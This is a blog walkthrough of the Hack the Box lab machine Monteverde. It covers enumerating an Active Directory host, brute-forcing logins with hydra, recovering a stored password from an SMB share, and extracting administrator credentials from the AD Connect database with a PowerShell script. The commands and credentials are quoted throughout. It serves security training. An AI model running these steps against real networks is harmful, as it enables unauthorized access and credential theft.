June 13, 2020

Hack the Box - Monteverde

Posted on June 13, 2020  •  5 minutes  • 951 words

Welcome back! Today’s write-up will be for the Hack the Box machine Monteverde. This is listed as a medium Windows machine.

Let’s jump in!

As always, we start with our standard nmap scan: nmap -sC -sV -p- -oA allscan

Here are our results:

Nmap scan report for
Host is up (0.19s latency).
Not shown: 65516 filtered ports
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-01-15 20:40:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49778/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 10m35s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-01-15T20:43:18
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
# Nmap done at Wed Jan 15 15:35:20 2020 -- 1 IP address (1 host up) scanned in 1691.42 seconds

We see that we have a bunch of ports open. We see some SMB, RPC, DNS and LDAP. To further our enumeration we will use enum4linux. We’ll also add megabank to our hosts file for further usage.

Command: enum4linux -A

This returns a large set of results. The key things we get from this are:

We’ll also try to null authenticate to the SMB port via smbclient or smbmap but we get no results.

Much like we did in the machine Resolute, we will make a few LDAP queries to see if there is any data stored in the user’s AD variables.

Command: ldapsearch -x -h megabank -b 'dc=megabank,dc=local' "(&(objectClass=user))"

We’ll take these and put them into a list for use later. I created two lists, one with the domain prefix and another without. We didn’t see any data in the AD fields associated with the user accounts. Now we have a few options, with a username list we can try and brute force our way in or continue to look for leaky data and services. Why not both?

First we’ll try to use the account name as a password, then we’ll try a password list like rockyou. For this we’ll use hydra.

Command: hydra -L users-nodm.lst -P users-nodm.lst ldap2

We use the -L to specify a username list. The -P is for a password list. Then the IP followed by the service we want to use.

We get a match! SABatchJobs:SABatchJobs.

Well, I did not expect that. Normally I would continue with Rockyou.txt but the box is already pretty unstable connection wise, so we’ll opt out of that for now and see where we can get with these service account credentials.

Since we have a set of credentials and we know that WinRM is running we can try to leverage evil-winRM. We try to login but we aren’t able to. Next we’ll want to try to use these authenticated credentials in order to enumerate the previously spotted SMB port.

Command: smbmap -u SABatchJobs -p SABatchjobs -H

We get a few shares back - C$, E$, azure_uploads, NETLOGON, SYSVOL and users$.

The users$ share is read only, so we’ll first start by connecting to this and seeing if there are any credentials saved by the users in thier home directories.

Command: smbclient -U SABatchJobs //$

We start looking into each users directory. We only find one file, azure.xml, in mhope’s home directory. We download the file with get. When we open it up, we see some credentials!

Armed with this potential password, we’ll try to authenticate as mhope.

Command: evil-winrm -i -u mhope -p 4n0therD4y@n0th3r$

We head over to mhope’s Desktop and get our User.txt flag. We start to enumerate internally now. We see that net user mhope shows him as part of the Azure admins.

I then like to run WindowsEnum.ps1 on a machine to get a basic idea of my rights and what I can see from the current user. Right away we see Microsoft AADSync. Since I’ve spent time as a System Engineer, I knew this was the immediate path I would take.

There is a powershell script called Azure-ADConnect that will extract the password from the ADSync database. You can also read more on it here as well.

The first thing we do is curl or wget the script.

Command: wget

Next we upload the file via our Evil-WinRM session.

Command: upload Azure-ADConnect.ps1

Next we import the module. Then supply the database location and name and let it rip!

Command: import-module ./Azure-ADConnect.ps1 Azure-ADConnect -server -db ADSync

Now we have the Administrator credentials, we can try and log back in via Evil-WinRM to see if they work.

They do work! We log in, head over to the Administrator’s Desktop and snag the root.txt flag!

Hopefully everyone was able to take something away from this blog post. If so, think about sending me some respect over on HTB. Here’s my profile .

Follow me

I hack things and tweet about things...